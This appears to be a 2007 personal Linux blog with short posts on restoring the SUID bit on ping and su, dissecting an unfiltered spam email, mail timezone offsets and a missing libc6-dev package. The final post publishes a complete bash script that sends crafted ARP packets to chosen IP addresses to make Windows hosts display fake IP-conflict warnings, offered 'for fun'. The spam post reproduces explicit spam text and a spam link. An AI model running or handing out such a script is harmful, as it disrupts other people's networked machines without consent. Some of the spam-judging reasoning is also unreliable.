Sunday, September 30, 2007

ping: icmp open socket: Operation not permitted on ubuntu

Since an update the ping command stopped working on my ubuntu system. I always get to error “ping: icmp open socket: Operation not permitted”. Because I don’t wan’t to always use sudo with ping, I did following change on my system:

$ ls -al /bin/ping
-rwxr-xr-x 1 root root 27140 2006-12-19 21:35 /bin/ping

is WRONG. ping must have the SUID-flag!

$ sudo chmod u+s /bin/ping

$ ls -al /bin/ping
-rwsr-xr-x 1 root root 27140 2006-12-19 21:35 /bin/ping

Now it works again

Posted by schmidi2 in 16:13:59 | Permalink | No Comments »

su: Authentication failure on ubuntu

Since an update the su command stopped working on my ubuntu system. I always get to error “su: Authentication failure” when typing the right password. Because I need this command, I did following change on my system:

$ ls -al /bin/su
-rwxr-xr-x 1 root root 27140 2006-12-19 21:35 /bin/su

is WRONG. su must have the SUID-flag!

$ sudo chmod u+s /bin/su

$ ls -al /bin/su
-rwsr-xr-x 1 root root 27140 2006-12-19 21:35 /bin/su

 

Yea I know there is sudo. But nobody has the right to forbid me using su if I want to.

Posted by schmidi2 in 16:07:57 | Permalink | No Comments »

Wednesday, September 19, 2007

SPAM-eMail which wasn’t filtered out

Today I got this SPAM-eMail:

From - Wed Sep 19 19:27:40 2007
X-Account-Key: account7
X-UIDL: 186724015
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path:
Received: from relay03.mediabeam.com ([194.25.41.10])
by smtp.directbox.com ([194.25.41.68]) with SMTP
for ; Wed, 19 Sep 2007 13:14:57 +0200
Received: from px.nl (37.net059085255.t-com.ne.jp [59.85.255.37])
by relay03.mediabeam.com (8.13.1/8.13.1) with SMTP id l8JBEXUD010048
for ; Wed, 19 Sep 2007 13:14:36 +0200
Reply-To: "Bettie Waller"
From: "Bettie"
Message-ID: <1333211882.547268997208@px.nl>
Date: Wed, 19 Sep 2007 07:13:03 -0400
To: <notpublished@notpublished.com>
Subject: Young Lesbian Breannas On Sofa Fucks & Teasing
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-mediaBEAM-MailScanner-Information: Spam-/VirusProtection V1.0
X-mediaBEAM-VirusProtection: clean
X-mediaBEAM-SpamScore: 3
We're glad to inform you,
Shaved French Melanie Interracial Banged On Boat
Tied Up Hentai Brittany Gets Her Beaver Tortured
http://tstfofy.ijuwyvow.cn/?md7eahrk3t9
Have a good time!
sinside out,blues reader

Because of following criterias/reasons it had to be filtered by the AntiSPAM-engine:
  • There is no single “Received:”-line in the header come from the sending SMTP-server
  • The subject contains words like: “Lesbian”, “Fucks” and “Teasing” which a normal user would never put in the subject
  • The Headers “Reply-To” and “From” have the same address but not the same name (“Bettie Waller” and “Bettie”). Would an eMail-client (MUA = mail user agent) like Mozilla Thunderbird do that?
  • As you can see in the Date-Header (Date: Wed, 19 Sep 2007 07:13:03 -0400), this eMails comes from afar. These countries uses the timezone UTC+4: Armenia, Azerbaijan, French Southern Territories, Îles Crozet, Georgia, Mauritius, Oman, Réunion, Russia, Samara Oblast, Udmurt Republic, Scattered islands in the Indian Ocean, Glorioso Islands, Tromelin Island, Seychelles and the United Arab Emirates (found here). Most of these countries I do not even know how to spell them out. Why on earth an eMail from there can really NOT be a spam-eMail.
  • The sender-address “edwinmjqf@px.nl” contains a few letters in an exceptional order (like “n” followed by “m”, “q” followed by “f”, …)
  • The 7bit-encoding (“Content-Transfer-Encoding: 7bit”) is only used by old SMTP-server. If people want to sent important eMails, they shall use modern technology
  • The name used in the from-header (From: “Bettie” ) isn’t used also in the address.
  • The TDL “.nl” is owned by the country Netherlands and they use the time zone UTC+1 not UTC+4 as stated in the date-header
  • I never got a nonspam eMail from “.nl”
  • If I didn’t convince you yet, here is my last criteria: The mailserver of the domain “px.nl” called “mail.px.nl” doesn’t known the address “edwinmjqf@px.nl”:
    nslookup -query=MX px.nl
    telnet mail.px.nl 25

    RCPT TO:edwinmjqf@px.nl
    550 : Recipient address rejected: User unknown in virtual mailbox table

What the hell did that AntiSPAM-engine “think”!

 

Posted by schmidi2 in 21:01:04 | Permalink | No Comments »

Sent mails with numeric timezone +0200 instead of +0100

I asked myself why my sent eMails have the numeric timezone “+0200″ even though I live in Switzerland where we are in the UTC+1 time zone.

After a short scan through my eMails I found out:

 

eMails sent in summer time do have the numeric timezone “+0200″ like

Mail-Header:
Date: Tue, 18 Sep 2007 17:47:12 +0200

All eMails I sent in winter time (eg. sometime in january) do have the numeric timezone “+0100″ like

Mail-Header:
Date: Wed, 03 Jan 2007 10:36:59 +0100

 

This is only the case if your country has the summer time (also called daylight saving time). If you don’t have it, all your eMails do have the same numeric timezone. If you don’t know that, check it out here.

Wikipedia wrote it that way:
Central European Summer Time (CEST) is one of the names of UTC+2 time zone, 2 hours ahead of Coordinated Universal Time. It is used as a summer daylight saving time in most European and some North African countries. During the winter, Central European Time (UTC+1) is used.

 

Only by the way I want to mention an alternative format used for absolut times (date and time including time zone). Search for “Internet Time” or go directly to the wikipedia-article:

http://en.wikipedia.org/wiki/Internet_Time

 

Posted by schmidi2 in 20:11:48 | Permalink | No Comments »

Tuesday, September 18, 2007

configure: error: compiler cannot create executables

The error message “checking for C compiler default output file name… configure: error: C compiler cannot create executables” did I get today when trying to configure maildrop (v. 2.0.4).

/usr/src/maildrop/maildrop-2.0.4$ ./configure
checking for a BSD-compatible install… /usr/bin/install -c
checking whether build environment is sane… yes
checking for gawk… no
checking for mawk… mawk
checking whether make sets $(MAKE)… no
checking for gcc… gcc
checking for C compiler default output file name… configure: error: C compiler cannot create executables
See `config.log’ for more details.

In the file “config.log” you find these lines:


configure:2326: checking for C compiler default output file name
configure:2329: gcc    conftest.c  >&5
/usr/bin/ld: crt1.o: No such file: No such file or directory
collect2: ld returned 1 exit status
configure:2332: $? = 1
configure: failed program was:
| /* confdefs.h.  */
|
| #define PACKAGE_NAME “maildrop”

configure:2371: error: C compiler cannot create executables
See `config.log’ for more details.

configure: exit 77

So the file “crt1.o” is missing. Year, the package libc6-dev isn’t installed:

$ sudo apt-get install libc6-dev

Now it works! 

Posted by schmidi2 in 15:24:30 | Permalink | No Comments »

Sunday, September 9, 2007

Remote fake IP conflict on windows systems

Hey unix users! Below is a little script named ”sendIPconflict”. With it you can force a ip conflict error message on a windows system by running it with one or more ip addresses as parameters.

 

——————————————————————————–
#!/bin/bash
#
# Name: sendIPconflict
# Version: 1.0
# Date: 2007-09-09 05:25pm
# Author: Benjamin Schmidt <schmidi2@directbox.com>
# License: GNU GPL
#

# Description:
# Expects one or more IP’s as parameters or from STDIN (one IP per line).
# This script then sends an arp-package to the owner of the specified IP
# and causes (on windows-systems) to show a warning-dialog about a IP conflict.
# Note: No ARP-Spoofing is made!
#
# Requirements:
# This script needs bash and the tool send_arp/arping (on a debian-system you
# have to install the packages fake and arping).
# You must run this script as root otherwise send_arp will fail with
# the msg “socket: Operation not permitted”.
#
# Use this script for education or for a little bit fun. Don’t abuse it!
#

# This MAC-address is automatically generated by vmware
MY_MAC=”00:0c:29:23:b8:0a”

# This script has to run as root (check this and change to root if required)
if [ $UID -ne 0 ];
then
   echo “This script needs root privileges!”
   echo “Please, type root’s password…”
   su -c “$0 $1 $2 $3 $4 $5 $6 $7 $8 $9″
   exit 1
fi

# Check if required tools are available
if [ -z "`which arping`" -o -z "`which send_arp`" ];
then
   echo “Please install arping and send_arp to run this script!”
   echo “On a debian system you have to install the packages fake and arping.”
   exit 1
fi

IPs=”"

# First check parameters
while [ "$1" != "" ]; do
   IPs=$IPs” “$1
   shift
done

# If no parameter was passed, listen on STDIN
if [ -z "$IPs" ];
then
   while read in; do
      IPs=$IPs” “$in
   done
fi

for TARGET_IP in $IPs
do
   # First get the MAC address of the IP owner
   TARGET_MAC=”`arping -fc 1 $TARGET_IP 2>/dev/null | grep “Unicast” | cut -d “[" -f 2 | cut -d "]” -f 1`”
   if [ -z "$TARGET_MAC" ];
   then
      # An older version of arping doesn’t work the same way
      TARGET_MAC=”`arping -c 1 $TARGET_IP 2>/dev/null | grep “from” | cut -d ” ” -f 4`”
   fi
   
   if [ -z "$TARGET_MAC" ];
   then
      echo “The IP $TARGET_IP is not online!”
      continue
   fi

   # Then send only to this host an ARP-package that his IP now
   # also registered on my host
   send_arp $TARGET_IP $MY_MAC $TARGET_IP $TARGET_MAC

   echo “Sent IP conflict message to IP $TARGET_IP”
done
——————————————————————————–
 

Posted by schmidi2 in 16:33:49 | Permalink | No Comments »